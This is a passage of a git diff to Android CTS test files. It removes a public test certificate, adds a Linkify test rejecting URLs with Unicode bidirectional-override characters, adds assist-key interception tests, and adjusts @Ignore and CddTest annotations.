-ZF90ZWxlcGhvbnlfY3RzX3Rlc3RrZXkwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC9
-IXCTl7o3J6gy5YleQRFm5Xahth5hwpC7b/cfZiSW25AqNLZRcZJZDwYiJIpqOu773Hr5fEZMV5c1
-tYivwdwKnoGlWiqrpvwafIQxsAPtKoiSsB6r6Zx4hZBDzf5M+PRi3ieUrPrwaiGeVy1n4nPhcpHy
-bzE2G+ZkfzxRYRmmObi8+UC4lkI2dL1Y17hjNmWpeJrfhvl67K2gMmAtwjW2UxhyOcACg8Mya1eA
-VyqQgiEfMb52FK1opshHnGpIcLjY7UT1IesOZpWu3OWqiOw/KCU+nJaEemYFYceGR14RGfKk9r1N
-hcRhZLXPfZHr9TPsJ/O/oKrF3Q+TxoUJIhQ3lcYREftrqMZNDUUANENnfd1Bviu2atschG5Ohchk
-MiuKDadMl++LOkfGjoTikQXUHGxb4GIfgLJDmkp6+Andc2iZ2pRPm6zQmHXWmcwtz3RvyGtK0oYJ
-xwpVy0InE/Ao1sH8LrYvBPWKDVHbG2v+ydYYrx39ScBLgXQ4gxmTNU8+YX3zXVaGWMPuVP2GfyBl
-O+fl27RZO/XZlC28TQEMAvytSyeTs4blubRlLgcf9wAv774a797g7uSRSZ+8aqumatPrtZnhBojU
-2U4zuQilE5JGIIvM5ZGWUNMMkY5bB4bnw36oSK7kup8dyLlT7Jgfpc5RuzYPKzU+OcH/k0SeZwID
-AQABo1AwTjAMBgNVHRMEBTADAQH/MB0GA1UdDgQWBBR4+8+XqYU6x7dqy/fwqz5eG2TQIjAfBgNV
-HSMEGDAWgBR4+8+XqYU6x7dqy/fwqz5eG2TQIjANBgkqhkiG9w0BAQsFAAOCAgEAaxTiY0j+Xgig
-WnsfqJRCV7Qn6LFhCyS2zc96g+m0CkiPLW83BFkVND9JaAUVw3GIUKDEtZkUy3v5L4//QmfdYIbH
-IBX5d/GJAVkH4MRFb47Mr2qu6t33eNiDaRzJe5WIQ+3qI1P0/2ihqKOAEC8OSWQWzY8eWB9O4vKp
-U/0JENOcSTfthce7dDhCCqw3P0Xmo9xW1x9YqcAPzNcQE7Lm68MeOB9esoTlIFS7R9tRp17pBU8Y
-Lw9WSRFy6jBYX1Wf83M96+WPNQensLymnXMDuwJhoNV5MnGMkqsASfkzZwLxcLRKlt4gJ4gmmPlM
-mIeJCcMvUJIMOlYcNEiBF4i4CkzA/ThxPRXSCZdQKjzM5YG7Sj3uEJTYgDq+50k/nKnhqKymZhQN
-pXtax3/2ivonWfNaWWIYBEY3aRQTb3IwTRjM1ib6Aj4sIjATzP0vowmYoQf/iv5HKYyndyRcy4zR
-LeOUbU5Hk0Rhc896eOFshwuB8VQ/6kiIPWN4VRNXn/hjT+p5y+ww8IM1crLV+ftdRDhDKbgxNfo1
-R1uhZgRryzWBmFEz6wSKDctdVeZ087e3pfze+V3/hrT2gevoYtcMHT7+qmNssnDbUinXJicQAQBn
-Wl2lx+PwyRnQ1dAozjcpytqXNmRF/881E2MvtdAN5Y4F5d0fh32Yi455xQ5UNb0=
------END CERTIFICATE-----
-
diff --git a/tests/tests/text/src/android/text/util/cts/LinkifyTest.java b/tests/tests/text/src/android/text/util/cts/LinkifyTest.java
index c0ad4b6..eee20a2 100644
--- a/tests/tests/text/src/android/text/util/cts/LinkifyTest.java
+++ b/tests/tests/text/src/android/text/util/cts/LinkifyTest.java
@@ -935,6 +935,17 @@
domain.length(), email);
}
+ @Test
+ public void testAddLinks_unsupportedCharacters() {
+ String url = "moc.diordna.com";
+ verifyAddLinksWithWebUrlSucceeds(url + " should be linkified", url);
+
+ verifyAddLinksWithWebUrlFails("u202C character should not be linkified", "\u202C" + url);
+ verifyAddLinksWithWebUrlFails("u202D character should not be linkified", url + "\u202D");
+ verifyAddLinksWithWebUrlFails(
+ "u202E character should not be linkified", url + "moc\u202E.diordna.com");
+ }
+
// Utility functions
private static void verifyAddLinksWithWebUrlSucceeds(String msg, String url) {
verifyAddLinksSucceeds(msg, url, Linkify.WEB_URLS);
diff --git a/tests/tests/view/src/android/view/cts/KeyEventInterceptTest.java b/tests/tests/view/src/android/view/cts/KeyEventInterceptTest.java
index 32f5358..598552b 100644
--- a/tests/tests/view/src/android/view/cts/KeyEventInterceptTest.java
+++ b/tests/tests/view/src/android/view/cts/KeyEventInterceptTest.java
@@ -44,9 +44,6 @@
* KEYCODE_HOME
* This test launches an Activity and inject KeyEvents with the corresponding key codes.
* The test will fail if any of these keys are received by the activity.
- * Note: The ASSIST tests were removed because they caused a side-effect of launching the
- * assistant asynchronously (as intended), which causes problems with tests which happen to
- * be running later and lose focus/visibility because of that extra window.
*/
@MediumTest
@RunWith(AndroidJUnit4.class)
@@ -66,6 +63,16 @@
}
@Test
+ public void testKeyCodeAssist() {
+ testKey(KeyEvent.KEYCODE_ASSIST);
+ }
+
+ @Test
+ public void testKeyCodeVoiceAssist() {
+ testKey(KeyEvent.KEYCODE_VOICE_ASSIST);
+ }
+
+ @Test
public void testKeyCodeHome() {
testKey(KeyEvent.KEYCODE_HOME);
}
diff --git a/tests/tests/widget/src/android/widget/cts/VideoView2Test.java b/tests/tests/widget/src/android/widget/cts/VideoView2Test.java
index 410c318..3043f45 100644
--- a/tests/tests/widget/src/android/widget/cts/VideoView2Test.java
+++ b/tests/tests/widget/src/android/widget/cts/VideoView2Test.java
@@ -18,7 +18,8 @@
import static android.content.Context.KEYGUARD_SERVICE;
-import static org.junit.Assert.assertEquals;
+import static junit.framework.Assert.assertEquals;
+
import static org.mockito.Matchers.same;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.timeout;
@@ -59,6 +60,7 @@
/**
* Test {@link VideoView2}.
*/
+@Ignore
@LargeTest
@RunWith(AndroidJUnit4.class)
public class VideoView2Test {
@@ -141,7 +143,6 @@
@UiThreadTest
@Test
- @Ignore
public void testConstructor() {
new VideoView2(mActivity);
new VideoView2(mActivity, null);
@@ -149,7 +150,6 @@
}
@Test
- @Ignore
public void testPlayVideo() throws Throwable {
// Don't run the test if the codec isn't supported.
if (!hasCodec()) {
@@ -173,7 +173,6 @@
}
@Test
- @Ignore
public void testPlayVideoOnTextureView() throws Throwable {
// Don't run the test if the codec isn't supported.
if (!hasCodec()) {
diff --git a/tests/vr/src/android/vr/cts/VrFeaturesTest.java b/tests/vr/src/android/vr/cts/VrFeaturesTest.java
index a0c6457..caf1ade 100644
--- a/tests/vr/src/android/vr/cts/VrFeaturesTest.java
+++ b/tests/vr/src/android/vr/cts/VrFeaturesTest.java
@@ -21,8 +21,6 @@
import android.os.Process;
import android.test.ActivityInstrumentationTestCase2;
-import com.android.compatibility.common.util.CddTest;
-
public class VrFeaturesTest extends ActivityInstrumentationTestCase2<CtsActivity> {
private CtsActivity mActivity;
@@ -30,7 +28,6 @@
super(CtsActivity.class);
}
- @CddTest(requirement="7.9.2/C-1-2")
public void testLacksDeprecatedVrModeFeature() {
mActivity = getActivity();
boolean hasVrMode = mActivity.getPackageManager().hasSystemFeature(
@@ -43,7 +40,6 @@
}
}
- @CddTest(requirement="7.9.2/C-1-3")
public void testSustainedPerformanceModeSupported() {
mActivity = getActivity();
PowerManager pm = (PowerManager) mActivity.getSystemService(Context.POWER_SERVICE);
